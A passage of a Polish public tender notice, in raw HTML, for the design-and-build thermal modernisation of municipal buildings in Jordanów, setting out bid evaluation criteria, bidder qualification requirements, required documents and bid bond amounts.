class="normal">1. Przy ocenie ofert w każdej z części zamówienia oddzielnie Zamawiający będzie kierował się kryteriami przedstawionymi poniżej:<br/>2. Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>Przy wyborze oferty najkorzystniejszej, Zamawiający będzie się kierował następującymi kryteriami i ich znaczeniem:<br/>1) dla części I-III <br/>a. Cena - 60 %,<br/>b. Długość okresu gwarancji jakości na przedmiot zamówienia – 40 %,<br/><br/>3. Punkty przyznawane za podane w pkt 2 kryteria będą liczone według następujących wzorów:<br/>3.1. dla części I-III:<br/>1) Kryterium cena:<br/><br/>C = (Cmin/Cr )* 100 pkt * 60 % <br/>C - liczba punktów przyznanych badanej ofercie w ramach kryterium cena <br/>C min – cena ofert najtańszej <br/>Cr – cena oferty rozpatrywanej<br/>Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców w zakresie kryterium ceny.<br/>Maksymalna liczba punktów – 60 pkt.<br/>Oferta wypełniająca w najwyższym stopniu wymagania określonego kryterium, otrzyma maksymalną ilość punktów.<br/>Pozostałym Wykonawcom, spełniającym wymagania przypisana zostanie odpowiednio mniejsza liczba punktów.<br/>2) Długość okresu gwarancji jakości na przedmiot zamówienia-40%<br/>Wykonawca zadeklaruje okres gwarancji w formularzu oferty.<br/>Oferta może otrzymać maksymalnie 40 pkt (1%=1pkt) w zakresie kryterium okres gwarancji na wykonany przedmiot umowy, przy czym:<br/>a) Oferta z 60 miesięcznym okresem gwarancji otrzyma 0 pkt<br/>b) Oferta z 72 miesięcznym okresem gwarancji otrzyma 20 pkt<br/>c) Oferta z 120 miesięcznym okresem gwarancji otrzyma 40 pkt<br/>Minimalny okres gwarancji na wykonany przedmiot umowy wymagany przez Zamawiającego nie może być krótszy niż 60 miesięcy licząc od dnia podpisania protokołu odbioru końcowego.<br/>Maksymalny okres gwarancji na wykonany przedmiot umowy nie może być dłuższy niż 120 miesięcy licząc od dnia podpisania protokołu odbioru końcowego<br/>Zaoferowanie dłuższego okresu gwarancji na wykonany przedmiot umowy niż 120 miesięcy liczone będzie, jak dla 120 miesięcy.<br/>W przypadku gdy Wykonawca nie wskaże w formularzu ofertowym okresu gwarancji, nie otrzyma punktów w nn. kryterium, a Zamawiający przyjmie, że zaoferowany okres jest okresem minimalnym i wynosi 60 miesięcy.<br/>W przypadku, kiedy Wykonawca w formularzu ofertowym wskaże okres gwarancji na wykonany przedmiot umowy krótszy niż 60 miesięcy wówczas Zamawiający odrzuci ofertę Wykonawcy jako niezgodną z treścią SWZ.<br/>4. Oferta, która otrzyma największą, łączną liczbę punktów uznana zostanie za najkorzystniejszą( w każdej z części zamówienia oddzielnie). Ocena ogólna poszczególnych ofert dokonywana będzie w oparciu o poniższą formułę:<br/>P = C + G<br/>P – oznacza łączną oceną jako sumę punktów w poszczególnych kryteriach<br/>C – liczba punktów uzyskanych w kryterium cena<br/>G - liczba punktów uzyskanych w kryterium długość okresu gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji jakości na przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest termomodernizacja obiektów użyteczności publicznej na terenie Miasta Jordanowa realizowana w formule „zaprojektuj i wybuduj” w ramach Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych, obejmująca 4części <br/>Część 3 – Budynek Szkoły Podstawowej im. Bohaterów Września 1939, ul. Konopnickiej 2, 34- <br/>240 Jordanów;<br/>Główny kod CPV: 45215000-7 -Roboty budowlane w zakresie budowy obiektów budowlanych opieki <br/>zdrowotnej i społecznej, krematoriów oraz obiektów użyteczności <br/>publicznej<br/>Projektowanie – kod CPV: 71320000-7;<br/>Roboty budowlane – kod CPV: 45111100-9, 45111300-1, 45111200-0, 45453100-8, 45320000-6, <br/>45111240-2, 45321000-3, 45262100-2, 45421000-4, 45421100-5, <br/>Roboty sanitarne – kod CPV: 45331000-6; <br/>Roboty elektryczne – kod CPV: 31520000-7, 09331200-0;<br/><br/>a) Projektowanie (usługi architektoniczne, budowlane, inżynieryjne i kontrolne) <br/>b) Roboty budowlane, w tym: <br/>Roboty rozbiórkowe <br/>Roboty ziemne <br/>Roboty przygotowawcze <br/>Izolacja fundamentów i ścian piwnic <br/>Drenaż <br/>Termomodernizacja ścian <br/>Rusztowania <br/>Izolacja termiczna poddasza <br/>Stolarka <br/>Podokienniki <br/>c) Instalacje sanitarne, w tym:<br/>Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych <br/>d) Instalacje elektryczne, w tym:<br/>Oprawy oświetleniowe sufitowe <br/>Słoneczne moduły fotoelektryczne </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45215000-7 - Roboty budowlane w zakresie budowy obiektów budowlanych opieki zdrowotnej i społecznej, krematoriów oraz obiektów użyteczności publicznej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">471 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy ocenie ofert w każdej z części zamówienia oddzielnie Zamawiający będzie kierował się kryteriami przedstawionymi poniżej:<br/>2. Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>Przy wyborze oferty najkorzystniejszej, Zamawiający będzie się kierował następującymi kryteriami i ich znaczeniem:<br/>1) dla części I-III <br/>a. Cena - 60 %,<br/>b. Długość okresu gwarancji jakości na przedmiot zamówienia – 40 %,<br/><br/>3. Punkty przyznawane za podane w pkt 2 kryteria będą liczone według następujących wzorów:<br/>3.1. dla części I-III:<br/>1) Kryterium cena:<br/><br/>C = (Cmin/Cr )* 100 pkt * 60 % <br/>C - liczba punktów przyznanych badanej ofercie w ramach kryterium cena <br/>C min – cena ofert najtańszej <br/>Cr – cena oferty rozpatrywanej<br/>Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców w zakresie kryterium ceny.<br/>Maksymalna liczba punktów – 60 pkt.<br/>Oferta wypełniająca w najwyższym stopniu wymagania określonego kryterium, otrzyma maksymalną ilość punktów.<br/>Pozostałym Wykonawcom, spełniającym wymagania przypisana zostanie odpowiednio mniejsza liczba punktów.<br/>2) Długość okresu gwarancji jakości na przedmiot zamówienia-40%<br/>Wykonawca zadeklaruje okres gwarancji w formularzu oferty.<br/>Oferta może otrzymać maksymalnie 40 pkt (1%=1pkt) w zakresie kryterium okres gwarancji na wykonany przedmiot umowy, przy czym:<br/>a) Oferta z 60 miesięcznym okresem gwarancji otrzyma 0 pkt<br/>b) Oferta z 72 miesięcznym okresem gwarancji otrzyma 20 pkt<br/>c) Oferta z 120 miesięcznym okresem gwarancji otrzyma 40 pkt<br/>Minimalny okres gwarancji na wykonany przedmiot umowy wymagany przez Zamawiającego nie może być krótszy niż 60 miesięcy licząc od dnia podpisania protokołu odbioru końcowego.<br/>Maksymalny okres gwarancji na wykonany przedmiot umowy nie może być dłuższy niż 120 miesięcy licząc od dnia podpisania protokołu odbioru końcowego<br/>Zaoferowanie dłuższego okresu gwarancji na wykonany przedmiot umowy niż 120 miesięcy liczone będzie, jak dla 120 miesięcy.<br/>W przypadku gdy Wykonawca nie wskaże w formularzu ofertowym okresu gwarancji, nie otrzyma punktów w nn. kryterium, a Zamawiający przyjmie, że zaoferowany okres jest okresem minimalnym i wynosi 60 miesięcy.<br/>W przypadku, kiedy Wykonawca w formularzu ofertowym wskaże okres gwarancji na wykonany przedmiot umowy krótszy niż 60 miesięcy wówczas Zamawiający odrzuci ofertę Wykonawcy jako niezgodną z treścią SWZ.<br/>4. Oferta, która otrzyma największą, łączną liczbę punktów uznana zostanie za najkorzystniejszą( w każdej z części zamówienia oddzielnie). Ocena ogólna poszczególnych ofert dokonywana będzie w oparciu o poniższą formułę:<br/>P = C + G<br/>P – oznacza łączną oceną jako sumę punktów w poszczególnych kryteriach<br/>C – liczba punktów uzyskanych w kryterium cena<br/>G - liczba punktów uzyskanych w kryterium długość okresu gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji jakości na przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest termomodernizacja obiektów użyteczności publicznej na terenie Miasta Jordanowa realizowana w formule „zaprojektuj i wybuduj” w ramach Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych, obejmująca 4części<br/>Część 4 – sprawowanie nadzoru inwestorskiego;<br/>Przedmiotem części 4 zamówienia jest sprawowanie nadzoru inwestorskiego<br/>nad zadaniami, objętymi zakresem części 1-3 zamówienia, przez wyznaczonego przez Wykonawcę inspektora nadzoru inwestorskiego w specjalności adekwatnych do specjalności dotyczących robót budowalnych<br/>Realizacja w czterech etapach ( fazach) które mogą się zazębiać i uzupełniać :<br/>a) Faza I przedinwestycyjna <br/>Okres opracowywania dokumentacji projektowej <br/>b) Faza II realizacja robót budowalnych <br/>c) Faza III odbiór robót budowalnych <br/>d) Faza IV monitorowanie projektu i rozliczenie inwestycji <br/>Do Wykonawcy należeć będzie zapewnienie i powołanie (zespołu) inspektorów nadzoru inwestorskiego we wszystkich wymaganych specjalnościach budowlanych, posiadających wymagane prawem uprawnienia do samodzielnego wykonywania funkcji technicznych w budownictwie.<br/><br/><br/>Główny kod CPV:71247000-1 - nadzór nad robotami budowlanymi<br/>Usługa kod CPV: 71520000-9 - usługi nadzoru budowlanego<br/>Usługa kod CPV: 71521000-6 - usługi nadzorowania placu budowy<br/>Usługa kod CPV: 71247000-1 - nadzór nad robotami budowlanymi,<br/>Usługa kod CPV: 71248000-8 - nadzór nad projektem i dokumentacją </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">471 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy ocenie ofert w każdej z części zamówienia oddzielnie Zamawiający będzie kierował się kryteriami przedstawionymi poniżej:<br/>2. Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>Przy wyborze oferty najkorzystniejszej, Zamawiający będzie się kierował następującymi kryteriami i ich znaczeniem:<br/>2) dla części IV<br/>a. cena - 60%,<br/>b. doświadczenie inspektora – 40% <br/><br/>3. Punkty przyznawane za podane w pkt 2 kryteria będą liczone według następujących wzorów:<br/>3.2. dla części IV: <br/>1) Kryterium cena:<br/><br/>C = (Cmin/Cr )* 100 pkt * 60 % <br/>C - liczba punktów przyznanych badanej ofercie w ramach kryterium cena <br/>C min – cena ofert najtańszej <br/>Cr – cena oferty rozpatrywanej<br/>Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców w zakresie kryterium ceny.<br/>Maksymalna liczba punktów – 60 pkt.<br/>Oferta wypełniająca w najwyższym stopniu wymagania określonego kryterium, otrzyma maksymalną ilość punktów.<br/>Pozostałym Wykonawcom, spełniającym wymagania przypisana zostanie odpowiednio mniejsza liczba punktów.<br/><br/>2) Doświadczenie inspektora- tj. tej samej osoby którą wykonawca wskaże w celu wykazania warunku udziału w postępowaniu z Rozdziału VIII pkt 2 ppkt 4) dla części IV b1) SWZ -<br/>40%&#34;<br/>Wykonawca zadeklaruje doświadczenie w formularzu oferty.<br/>Oferta może otrzymać maksymalnie 40 pkt (1%=1pkt) w zakresie kryterium doświadczenie inspektora na następujących zasadach:<br/>a) Podstawą oceny ofert w zakresie niniejszego kryterium będzie ilość nadzorowanych robót<br/>przez inspektora w specjalności:<br/>- konstrukcyjno-budowlanej <br/>Dana usługa nadzoru inwestorskiego będzie brana pod uwagę pod warunkiem, że została zakończona i pozytywnie odebrana.<br/><br/>b) Pod uwagę będzie brane wyłącznie doświadczenie osoby, która będzie uczestniczyć<br/>w realizacji niniejszego zamówienia pełniąc funkcję inspektora nadzoru w specjalności konstrukcyjno budowlanej .<br/>c) Zamawiający przyzna punkty za doświadczenie, na następujących zasadach:<br/>Doświadczenie inspektora: Przyznane punkty:<br/>- 1 inwestycja 0 pkt<br/>- 2 inwestycje 20 pkt<br/>- 3 inwestycje 40 pkt<br/>d) doświadczenie inspektora należy wykazać w formularzu ofertowym <br/><br/>Oferta, która otrzyma największą, łączną liczbę punktów uznana zostanie za najkorzystniejszą dla części IV. Ocena ogólna poszczególnych ofert dokonywana będzie w oparciu o poniższą formułę:<br/>P = C + D<br/>P – oznacza łączną oceną jako sumę punktów w poszczególnych kryteriach<br/>C – liczba punktów uzyskanych w kryterium cena<br/>D - liczba punktów uzyskanych w kryterium doświadczenie inspektora</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doswiadczenie inspektora</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu. <br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: <br/>1) zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie stawia warunku w powyższym zakresie (analogicznie dla części I, II ,III,IV zamówienia).<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający nie stawia warunku w powyższym zakresie. (analogicznie dla części I,II,III i IV zamówienia).<br/>3) sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie stawia warunku w powyższym zakresie. (analogicznie dla części I,II,III i IV zamówienia) zamówienia).<br/>4) zdolności technicznej lub zawodowej: Wykonawca spełni warunek, jeżeli wykaże że: <br/>Dla części I:<br/>a) w okresie ostatnich pięciu lat przed upływem terminu składania ofert w postepowaniu (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie), zrealizował co najmniej jedną robotę budowlaną polegającą na realizacji zadania podobnego do przedmiotu zamówienia tj. termomodernizacji obiektów budowlanych o wartości min. 300 000,00 zł brutto. <br/>b)wskażą, że dysponują lub będą dysponować podczas realizacji zamówienia co najmniej: :<br/>1) 1 projektantem posiadającym uprawnienia budowlane do projektowania bez ograniczeń w specjalności konstrukcyjno-budowlanej, który będzie pełnił funkcję głównego projektanta,<br/>2) 1 projektantem (poza wyżej wymienionym) posiadającym uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych<br/>3) 1 projektantem posiadającym uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych <br/>4) 1 osobą która pełnić będzie funkcję kierownika budowy posiadającą uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie tj. do kierowania robotami bez ograniczeń w specjalności konstrukcyjno-budowlanej<br/>5) 1 osobą która pełnić będzie funkcję kierownika prac/robót konserwatorskich: spełniająca wymagania, o których mowa w art. w art. 37a ust. 1 i 2 ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami.<br/>6) 1 osobą która pełnić będzie funkcję kierownika robót posiadającą uprawnienia do kierowania robotami bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych <br/>7) 1 osobą która pełnić będzie funkcję kierownika robót posiadającą uprawnienia do kierowania robotami bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych<br/>Dla części II :<br/>a) w okresie ostatnich pięciu lat przed upływem terminu składania ofert w postepowaniu (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie), zrealizował co najmniej jedną robotę budowlaną polegającą na realizacji zadania podobnego do przedmiotu zamówienia tj. termomodernizacji obiektów budowlanych o wartości min. 500 000,00 zł brutto. <br/>-b)wskażą, że dysponują lub będą dysponować podczas realizacji zamówienia co najmniej:<br/>1) 1 projektantem posiadającym uprawnienia budowlane do projektowania bez ograniczeń w specjalności konstrukcyjno-budowlanej, który będzie pełnił funkcje głównego projektanta<br/>2) 1 projektantem (poza wyżej wymienionym) posiadającym uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych<br/>3) 1 projektantem posiadającym uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych <br/>4) 1 osobą która pełnić będzie funkcję kierownika budowy posiadającą uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie tj. do kierowania robotami bez ograniczeń w specjalności konstrukcyjno-budowlanej<br/>5) 1 osobą która pełnić będzie funkcję kierownika robót posiadającą uprawnienia do kierowania robotami bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych <br/>6) 1 osobą która pełnić będzie funkcję kierownika robót posiadającą uprawnienia do kierowania robotami bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych<br/><br/>Dla części III :<br/>a) w okresie ostatnich pięciu lat przed upływem terminu składania ofert w postepowaniu (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie), zrealizował co najmniej jedną robotę budowlaną polegającą na realizacji zadań podobnych do przedmiotu zamówienia tj. termomodernizacji obiektów budowlanych o wartości min. 400 000,00 zł brutto. <br/>b) wskażą, że dysponują lub będą dysponować podczas realizacji zamówienia co najmniej: <br/>1) 1 projektantem posiadającym uprawnienia budowlane do projektowania bez ograniczeń w specjalności konstrukcyjno-budowlanej, który będzie pełnił funkcję głównego projektanta<br/>2) 1 projektantem (poza wyżej wymienionym) posiadającym uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych<br/>3) projektantem posiadającym uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych <br/>4) 1 osobą która pełnić będzie funkcję kierownika budowy posiadającą uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie tj. do kierowania robotami bez ograniczeń w specjalności konstrukcyjno-budowlanej<br/>5) 1 osobą która pełnić będzie funkcję kierownika robót posiadającą uprawnienia do kierowania robotami bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych <br/>6) 1 osobą która pełnić będzie funkcję kierownika robót posiadającą uprawnienia do kierowania robotami bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych<br/>Dla części IV:<br/>a) w okresie ostatnich trzech lat przed upływem terminu składania ofert w postepowaniu (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie), zrealizował co najmniej jedną usługę polegającą na nadzorowaniu robót budowlanych których wartość odebranych robót budowlanych wyniosła min. 500 000,00 zł brutto. <br/>b) wskażą, że dysponują lub będą dysponować podczas realizacji zamówienia co najmniej: następującymi osobami skierowanymi do realizacji zamówienia:<br/>1) 1 inspektorem nadzoru inwestorskiego posiadającym uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej, który będzie pełnił funkcję wiodącego inspektora nadzoru inwestorskiego;<br/>2) 1 inspektorem nadzoru inwestorskiego posiadającym uprawnienia budowlane do kierowania robotami budowalnymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych<br/>3) 1 inspektorem nadzoru inwestorskiego posiadającym uprawnienia budowlane do kierowania robotami budowalnymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych <br/>Inspektor nadzoru każdej specjalności winien być wpisany na listę członków właściwej regionalnej Izby Inżynierów Budownictwa.<br/>3. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców. <br/>4. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>(zgodnie z Rozdziałem VIII. SWZ Warunki udziału w postępowaniu ) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 5 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty - załącznik nr 6.1.do SWZ; ( dotyczy części I-III) <br/>2) wykaz usług( dotyczy części IV) polegających na nadzorowaniu robót budowlanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz, których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu; (doświadczenie zawodowe, załącznik nr 6.2 do SWZ – wzór),<br/><br/>3) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, , wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - załącznik nr 7 do SWZ;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: <br/>dla części 1: 20 000,00 zł (słownie: dwadzieścia tysięcy złotych); <br/>dla części 2: 24 000,00 zł (słownie: dwadzieścia cztery tysiące złotych);<br/>dla części 3: 19 000,00 zł ( słownie dziewiętnaście tysięcy złotych).<br/>dla części 4: 1 300,00 zł (słownie: tysiąc trzysta złotych);<br/>2. Wadium wnosi się przed upływem terminu składania ofert. <br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach: <br/>1) pieniądzu; <br/>2) gwarancjach bankowych; <br/>3) gwarancjach ubezpieczeniowych; <br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299). <br/>4. Wadium w formie pieniądza należy wnieść przelewem na rachunek bankowy zamawiającego: Urząd Miasta Jordanowa BS JORDANÓW nr konta 86 87990001 0000 0000 8859 0024 z adnotacją „WADIUM dot. termomodernizacja” ze wskazaniem numeru części zamówienia na które jest wnoszone wadium.<br/>Zamawiający zwraca uwagę, że za skuteczne wniesione wadium w formie pieniężnej uznaje się zaksięgowane kwoty na rachunku bankowym Zamawiającego. <br/>UWAGA: Za termin wniesienia wadium w formie 